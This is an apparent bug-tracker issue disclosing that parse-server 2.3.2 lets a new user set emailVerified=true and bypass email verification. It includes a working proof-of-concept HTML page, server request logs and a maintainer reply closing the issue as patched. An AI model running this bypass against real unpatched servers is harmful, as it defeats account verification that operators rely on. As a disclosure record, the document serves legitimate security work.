Vulnerability: Email verification can be circumvented

[haapaan]

User who has just signed up, can set emailVerified=true without actually verifying the email address. In other words, user does not have to click the link in the email to get his/her email validated.

Steps to reproduce

Steps that reproduce the issue:

1. Set the following settings in the server.js:
   verifyUserEmails: true,
   emailVerifyTokenValidityDuration: 2 * 60 * 60,
   preventLoginWithUnverifiedEmail: true,

2. signup, set emailVerified: true and save user. Here is sample html page that does just that:

<html>
<head>
<script type="text/javascript" src="https://npmcdn.com/parse/dist/parse.js"\>\</script>
<script type="text/javascript">
function signupAndSetEmailVerified()
{
Parse.initialize('e5c10b31d8716509af3e571260');
Parse.serverURL = 'http://127.0.0.1:8888/parse';

    var user = new Parse.User();
    user.set("username", "hacker");
    user.set("password", "passwd");
    user.set("email", "hacker@example.com");

    user.signUp(null, {
          success: function(user) {			  
            // Signup succeeded
            alert("Signup succeeded");				
			// Try hack emailVerified to true (should not succeed)
			user.set("emailVerified",true);
            user.save(null, {
              success : function(userAgain) {
                          // Execute any logic that should take place after the object is saved.
                          alert('Save succeeded');
                        },
              error : function(userAgain, error) {
                          alert('Save failed with '+error.message);
                      }
            });				
          },
          error: function(user, error) {
            // Show the error message somewhere and let the user try again.
            alert("Error: " + error.code + "\n\nwhat is the error \n\n " + error.message);
          }
    });   

}
</script>
</head>
<body onload="signupAndSetEmailVerified()">
</body>
</html>

Expected Results

Save should fail or at least emailVerified should still be false in the database for this user.

Actual Outcome

emailVerified is true in the database for this new user.

Environment Setup

• Server

  • parse-server version (Be specific! Don't say 'latest'.) : 2.3.2
  • Operating System: Ubuntu 14.04.5 LTS (running on VirtualBox virtual machine)
  • Hardware: EliteBook 8470p running VirtualBox Version 5.0.30 r112061
  • Localhost or remote server? (AWS, Heroku, Azure, Digital Ocean, etc): localhost

• Database

  • MongoDB version: v3.0.9. This issue is also reproducible with Postgresql 9.4.
  • Storage engine: default
  • Hardware: EliteBook 8470p running VirtualBox Version 5.0.30 r112061
  • Localhost or remote server? (AWS, mLab, ObjectRocket, Digital Ocean, etc): localhost

Logs/Trace

�[36mverbose�[39m: REQUEST for [POST] /parse/users: {
"username": "hacker",
"password": "",
"email": "hacker@example.com"
} method=POST, url=/parse/users, host=127.0.0.1:1337, user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0, accept=text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8, accept-language=en-US,en;q=0.5, accept-encoding=gzip, deflate, content-type=text/plain, origin=null, x-forwarded-for=10.0.2.2, x-forwarded-host=127.0.0.1:8888, x-forwarded-server=localhost, connection=Keep-Alive, content-length=214, username=hacker, password=, email=hacker@example.com
�[36mverbose�[39m: RESPONSE from [POST] /parse/users: {
"status": 201,
"response": {
"objectId": "cyl7z1XcSe",
"createdAt": "2017-01-18T12:16:05.861Z",
"sessionToken": "r:c54acc4bbcf051b306c7d0f8d4982646"
},
"location": "http://127.0.0.1:8888/parse/users/cyl7z1XcSe"
} status=201, objectId=cyl7z1XcSe, createdAt=2017-01-18T12:16:05.861Z, sessionToken=r:c54acc4bbcf051b306c7d0f8d4982646, location=http://127.0.0.1:8888/parse/users/cyl7z1XcSe
�[36mverbose�[39m: REQUEST for [PUT] /parse/classes/_User/cyl7z1XcSe: {
"emailVerified": true
} method=PUT, url=/parse/classes/_User/cyl7z1XcSe, host=127.0.0.1:1337, user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0, accept=text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8, accept-language=en-US,en;q=0.5, accept-encoding=gzip, deflate, content-type=text/plain, origin=null, x-forwarded-for=10.0.2.2, x-forwarded-host=127.0.0.1:8888, x-forwarded-server=localhost, connection=Keep-Alive, content-length=235, emailVerified=true
�[36mverbose�[39m: RESPONSE from [PUT] /parse/classes/_User/cyl7z1XcSe: {
"response": {
"updatedAt": "2017-01-18T12:16:06.833Z"
}
} updatedAt=2017-01-18T12:16:06.833Z

[flovilmart]

Thanks for reporting we'll have a look shortly.

[montymxb]

Closing as patched in #3681